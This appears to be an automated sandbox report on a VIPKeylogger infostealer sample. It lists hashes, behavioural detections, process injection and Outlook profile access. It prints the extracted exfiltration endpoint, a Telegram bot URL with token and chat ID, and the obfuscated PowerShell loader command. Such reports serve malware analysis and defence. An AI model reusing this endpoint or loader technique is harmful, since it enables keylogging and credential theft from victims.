Analysis
-
max time kernel
146s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
14/04/2025, 15:19
Static task
static1
Behavioral task
behavioral1
Sample
pago-568092-566534.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
Undvrligst130.ps1
Resource
win10v2004-20250410-en
General
-
Target
pago-568092-566534.exe
-
Size
806KB
-
MD5
ee9064c9429ce71f8840108fd27efcde
-
SHA1
20307672fd0b0f40ad0e6d035445b395578abfae
-
SHA256
88287f70307150fc1f469bf08e49dee581cdce1900dcf477a08d010e90fef57d
-
SHA512
fef7fa31a45dfd22ea2bac537f6f97373688698e1d1c7601cbe5e6646def952eb5f5f90302e127c87ce0aaa152f8700c312dc2ca859b329d8d49a4824c145f0d
-
SSDEEP
24576:7fYuPz30Oo2mDqFscQFAEIoOf7JGpbtg2:jPokeAE9OzUrg2
Malware Config
Extracted
vipkeylogger
https://api.telegram.org/bot7503700665:AAGL8MMCdDcG7tz-eC9bATTNxcDJaBzKQqA/sendMessage?chat_id=7618581100
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 7 IoCs
flow pid Process 24 1000 msiexec.exe 26 1000 msiexec.exe 28 1000 msiexec.exe 30 1000 msiexec.exe 35 1000 msiexec.exe 38 1000 msiexec.exe 51 1000 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 23 drive.google.com 24 drive.google.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 34 checkip.dyndns.org 37 reallyfreegeoip.org 38 reallyfreegeoip.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1000 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2740 powershell.exe 1000 msiexec.exe -
pid Process 2740 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pago-568092-566534.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2740 powershell.exe 2740 powershell.exe 2740 powershell.exe 2740 powershell.exe 2740 powershell.exe 2740 powershell.exe 2740 powershell.exe 2740 powershell.exe 2740 powershell.exe 1000 msiexec.exe 1000 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2740 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2740 powershell.exe Token: SeIncreaseQuotaPrivilege 2740 powershell.exe Token: SeSecurityPrivilege 2740 powershell.exe Token: SeTakeOwnershipPrivilege 2740 powershell.exe Token: SeLoadDriverPrivilege 2740 powershell.exe Token: SeSystemProfilePrivilege 2740 powershell.exe Token: SeSystemtimePrivilege 2740 powershell.exe Token: SeProfSingleProcessPrivilege 2740 powershell.exe Token: SeIncBasePriorityPrivilege 2740 powershell.exe Token: SeCreatePagefilePrivilege 2740 powershell.exe Token: SeBackupPrivilege 2740 powershell.exe Token: SeRestorePrivilege 2740 powershell.exe Token: SeShutdownPrivilege 2740 powershell.exe Token: SeDebugPrivilege 2740 powershell.exe Token: SeSystemEnvironmentPrivilege 2740 powershell.exe Token: SeRemoteShutdownPrivilege 2740 powershell.exe Token: SeUndockPrivilege 2740 powershell.exe Token: SeManageVolumePrivilege 2740 powershell.exe Token: 33 2740 powershell.exe Token: 34 2740 powershell.exe Token: 35 2740 powershell.exe Token: 36 2740 powershell.exe Token: SeDebugPrivilege 1000 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 5436 wrote to memory of 2740 5436 pago-568092-566534.exe 86 PID 5436 wrote to memory of 2740 5436 pago-568092-566534.exe 86 PID 5436 wrote to memory of 2740 5436 pago-568092-566534.exe 86 PID 2740 wrote to memory of 1000 2740 powershell.exe 98 PID 2740 wrote to memory of 1000 2740 powershell.exe 98 PID 2740 wrote to memory of 1000 2740 powershell.exe 98 PID 2740 wrote to memory of 1000 2740 powershell.exe 98 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\pago-568092-566534.exe"C:\Users\Admin\AppData\Local\Temp\pago-568092-566534.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5436 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle 1 "$Wolframet=GC -raw 'C:\Users\Admin\AppData\Local\Witnessers153\raabte\amuletters\Undvrligst130.Gul';$Canangium=$Wolframet.SubString(29282,3);.$Canangium($Wolframet)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1000
-
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Witnessers153\raabte\amuletters\Gennemarbejdningerne\Synkrocyklotroner\transudes.jpg
Filesize74B
MD51f48026df6e9e4aebc2867cb2a07a07d
SHA18098b69100ff43d1df93d7d42fead7a6aebe7638
SHA256994252c8960cf2a4008c57bb64c39a18937638230293db1ca2cbc7bc63fc8ba5
SHA5124edb34ee05c85efa311df528adc8954273fdfd6ad563aea480befee9e100e79f9492de3f26fd69ebd4bc510096866092dc24213835281d91bf8a9c536a725149
-
Filesize
54KB
MD563d3e9e12462b3b7ad4ca8835d3d08bd
SHA1d9aa8a0fad0c4c9eeb030e4da83b37aae9ae132b
SHA2561c739a595448826a25d50af246010dbb70fd6a78c5af3316509ff2073e5cad2c
SHA5128e5e65554e94703b893dcbc210d4d5c0949059eeb0a0e41ec3b16ffc746d5571b74d102c68c286670a2523447c1f9c2cb1a47c3088865bfe9752d744a9578274
-
Filesize
443KB
MD59281ab54ad5e8f29c9c398a8f991189e
SHA196eaa949d65066bce7350a42ba3a935d720dfaa5
SHA256c2ea74b43398f0001131401a191cbfc37b26c295b532b36b321550ee52e3235c
SHA5127ea3b63903d58052cab99c58dd55dc9e85a65fffee14eb589decbcba0315a920e895a762a95f37f64d2ce7c1589eb3da453950ec4cbcdfd4f8b49ce7be12abaa